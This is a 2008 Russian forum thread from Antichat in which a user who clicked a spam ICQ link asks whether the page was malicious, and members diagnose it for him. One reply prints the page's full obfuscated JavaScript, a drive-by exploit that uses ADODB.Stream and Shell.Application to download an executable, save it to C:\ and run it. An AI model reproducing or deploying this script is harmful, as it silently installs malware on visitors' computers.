Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
13.05.2008, 20:53
|
UID: 54195
USER: console done
Новичок
Регистрация: 13.04.2008
Сообщений: 3
Провел на форуме:
65858
Репутация:
0
|
|
лоханул в аське
Думал друг кинул сообщение с ссылкой так как он мне писал и в этот же момент пришла мессага от спамбота , я не заметил. Но перед тем как нажать проверил онлайн докторомвебом мне ничего не выдало и нажал  (
Эта ссылка ( не нажимать , кто не в теме ) Там пустая страница и смайлик слева.
Может кто проверить , есть там что ? Стоит последняя лиса и za . |
|
|
13.05.2008, 20:57
|
UID: 40167
USER: grishka
Участник форума
Регистрация: 11.08.2007
Сообщений: 220
Провел на форуме:
3736647
Репутация:
732
|
|
смайл типа тебя поимели
|
|
|
|
13.05.2008, 21:02
|
UID: 25035
USER: Petr
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме:
7792614
Репутация:
1223
|
|
Просмотри хтмлку и скопируй сюда
|
|
|
|
13.05.2008, 21:02
|
UID: 32147
USER: geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
вот там што )))
Код:
function ZLFZz(){
try {
var efds='';
var aZxrwkh = document.createElement("obj"+efds+"e"+efds+"ct");
aZxrwkh.setAttribute("id","a"+efds+"Zx"+efds+"rwkh");
aZxrwkh.setAttribute("class"+efds+"id","cls"+efds+"i"+efds+"d"+efds+":"+efds+"B"+efds+"D"+efds+"9"+efds+"6C5"+efds+"56-65A3"+efds+"-"+efds+"11D0-"+efds+"983"+efds+"A"+efds+"-"+efds+"00C"+efds+"04FC29E36");
var EkbSUoL = aZxrwkh.CreateObject("adodb"+efds+".stream",'');
var PEELt6 = aZxrwkh.CreateObject("S"+efds+"h"+efds+"el"+efds+"l"+efds+"."+efds+"A"+efds+"pplic"+efds+"ati"+efds+"on",'');
var dnigvr = aZxrwkh.CreateObject("msxml"+efds+"2"+efds+".X"+efds+"ML"+efds+"H"+efds+"T"+efds+"T"+efds+"P",'');
var jx89msS;
jx89msS=document.getElementById("sR28nH").innerText;
dnigvr.open("G"+efds+"E"+efds+"T",jx89msS,false);
dnigvr.send();
EkbSUoL.type = 1;
EkbSUoL.open();
EkbSUoL.Write(dnigvr.responseBody);
Frogxa = "c:\\S87ekhV.exe";
EkbSUoL.SaveToFile(Frogxa,2);
eval("PEE"+efds+"Lt6.Shel"+efds+"lExec"+efds+"ute("+efds+"F"+efds+"rog"+efds+"xa);");
}
catch(e) {window.location="bof.php"};
}
сплоент какой то ... через адодб
Последний раз редактировалось geezer.code; 13.05.2008 в 21:05..
|
|
|
|
13.05.2008, 21:05
|
UID: 25035
USER: Petr
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме:
7792614
Репутация:
1223
|
|
Типо должен был у тебя бразуер подвиснуть  |
|
|
|
13.05.2008, 21:08
|
UID: 54195
USER: console done
Новичок
Регистрация: 13.04.2008
Сообщений: 3
Провел на форуме:
65858
Репутация:
0
|
|
И всё ? Он внедрился в систему ? Его надо удалять? |
|
|
|
13.05.2008, 21:09
|
UID: 32147
USER: geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
он качает какуюто заразу(dnigvr.open("G"+efds+"E"+efds+"T",jx8 9msS,false) 
потом сохраняет в корень С
и запускает.
отработал через эксплорер . про файрфокс не знаю. |
|
|
|
13.05.2008, 21:11
|
UID: 52601
USER: Jailer
Познающий
Регистрация: 21.03.2008
Сообщений: 62
Провел на форуме:
1415395
Репутация:
81
|
|
Сообщение от console done
И всё ? Он внедрился в систему ? Его надо удалять? аааа он внедрился к тебе! Мы все умрём!!!!!
=)))
на самом деле установи норм антивирь и он всё заблочит
|
|
|
|
13.05.2008, 21:12
|
UID: 54195
USER: console done
Новичок
Регистрация: 13.04.2008
Сообщений: 3
Провел на форуме:
65858
Репутация:
0
|
|
Ахтунг. Что делать?
|
|
|
|
13.05.2008, 21:12
|
UID: 33597
USER: Exlibris
Постоянный
Регистрация: 26.02.2007
Сообщений: 495
Провел на форуме:
3835614
Репутация:
1386
|
|
имена функций ппц =) какой то супер тарабарщ кодер ваял =))
--
Ну короче если не пострчно и не вникая во все эти стршные переменные, разобратся то сделалось слудующее:
Функция, в ней сздается элемент(и не один), который в совю очередь на паге фигачит злодеяния(непонятные из за имен переменных(сложно разобратся)), потом короче все это сзодеяние незаметно для тебя открывается, так же открывая с собой файл(похоу вир0с) и отсылая и сохраня его тебе..в самом конце на скрипт bof.php
--
Короче вир0с ты поймал 99%
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
